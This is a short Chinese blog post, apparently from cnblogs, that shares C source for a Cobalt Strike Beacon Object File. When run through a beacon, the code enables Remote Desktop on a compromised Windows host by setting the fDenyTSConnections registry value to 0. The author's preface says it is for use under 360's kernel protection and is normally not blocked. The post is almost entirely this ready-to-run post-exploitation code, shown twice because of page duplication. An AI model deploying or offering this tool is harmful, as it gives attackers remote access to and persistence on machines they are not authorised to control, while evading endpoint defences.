Bof-RDP

前言：Bof-RDP的代码，核晶情况下使用，正常的话也不会拦截

 #include "bofdefs.h"
 
extern "C" {
#ifdef BOF
 
	BOOL StartRDP() {
 
		//DFR_LOCAL(NETAPI32, DsGetDcNameA);
		//DFR_LOCAL(NETAPI32, NetApiBufferFree);
		//DFR_LOCAL(KERNEL32, WinExec);
		
		DFR_LOCAL(ADVAPI32, RegOpenKeyExA);
		DFR_LOCAL(ADVAPI32, RegOpenKeyA);
		DFR_LOCAL(ADVAPI32, RegQueryValueExA);
		DFR_LOCAL(ADVAPI32, RegSetValueExA);
		DFR_LOCAL(ADVAPI32, RegEnumKeyExA);
		DFR_LOCAL(ADVAPI32, RegCloseKey);
 
		HKEY hKey;
		LONG lResult;
		DWORD dwValue;
 
		// Open the registry key for the RDP settings
		lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Control\\Terminal Server"), 0, KEY_SET_VALUE, &hKey);
		if (lResult != ERROR_SUCCESS) {
			BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not open registry key for Terminal Server.\n");
			return -1;
		}
 
		// Enable RDP by setting the fDenyTSConnections value to 0
		dwValue = 0;
		lResult = RegSetValueEx(hKey, TEXT("fDenyTSConnections"), 0, REG_DWORD, (const BYTE*)&dwValue, sizeof(dwValue));
		if (lResult != ERROR_SUCCESS) {
			BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not set registry value for fDenyTSConnections.\n");
			RegCloseKey(hKey);
			return -1;
		}
 
		BeaconPrintf(CALLBACK_OUTPUT, "[+] RDP has been enabled in the registry.\n");
		RegCloseKey(hKey);
		
		return 0;
	}
#endif
 
	void go(char* buff, int len) {
 
		//PDOMAIN_CONTROLLER_INFOA pdcInfo;
		//DWORD dwRet = DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);
		//if (ERROR_SUCCESS == dwRet) {
		//    BeaconPrintf(CALLBACK_OUTPUT, "%s", pdcInfo->DomainName);
		//}
 
		//NetApiBufferFree(pdcInfo);
		StartRDP();
	}
 
 
}
#ifndef BOF
 
void main(int argc, char* argv[]) {
 
	go(NULL, 0);
}
 
#endif

posted @ 2024-06-30 01:45 zpchcbd 阅读(31) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· Cobalt Strike Bof开发

· shellcode的编写学习

· FRPC动态启动

· 随笔-开发-Window10家庭版启用远程桌面功能 RDPwrap

· FRP 内网穿透

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)

Bof-RDP

我的标签

随笔档案

博客友链

	#include "bofdefs.h"

	extern "C" {
	#ifdef BOF

	BOOL StartRDP() {

	//DFR_LOCAL(NETAPI32, DsGetDcNameA);
	//DFR_LOCAL(NETAPI32, NetApiBufferFree);
	//DFR_LOCAL(KERNEL32, WinExec);

	DFR_LOCAL(ADVAPI32, RegOpenKeyExA);
	DFR_LOCAL(ADVAPI32, RegOpenKeyA);
	DFR_LOCAL(ADVAPI32, RegQueryValueExA);
	DFR_LOCAL(ADVAPI32, RegSetValueExA);
	DFR_LOCAL(ADVAPI32, RegEnumKeyExA);
	DFR_LOCAL(ADVAPI32, RegCloseKey);

	HKEY hKey;
	LONG lResult;
	DWORD dwValue;

	// Open the registry key for the RDP settings
	lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Control\\Terminal Server"), 0, KEY_SET_VALUE, &hKey);
	if (lResult != ERROR_SUCCESS) {
	BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not open registry key for Terminal Server.\n");
	return -1;
	}

	// Enable RDP by setting the fDenyTSConnections value to 0
	dwValue = 0;
	lResult = RegSetValueEx(hKey, TEXT("fDenyTSConnections"), 0, REG_DWORD, (const BYTE*)&dwValue, sizeof(dwValue));
	if (lResult != ERROR_SUCCESS) {
	BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not set registry value for fDenyTSConnections.\n");
	RegCloseKey(hKey);
	return -1;
	}

	BeaconPrintf(CALLBACK_OUTPUT, "[+] RDP has been enabled in the registry.\n");
	RegCloseKey(hKey);

	return 0;
	}
	#endif

	void go(char* buff, int len) {

	//PDOMAIN_CONTROLLER_INFOA pdcInfo;
	//DWORD dwRet = DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);
	//if (ERROR_SUCCESS == dwRet) {
	// BeaconPrintf(CALLBACK_OUTPUT, "%s", pdcInfo->DomainName);
	//}

	//NetApiBufferFree(pdcInfo);
	StartRDP();
	}


	}
	#ifndef BOF

	void main(int argc, char* argv[]) {

	go(NULL, 0);
	}

	#endif

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)

Bof-RDP

我的标签

随笔档案

博客友链

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)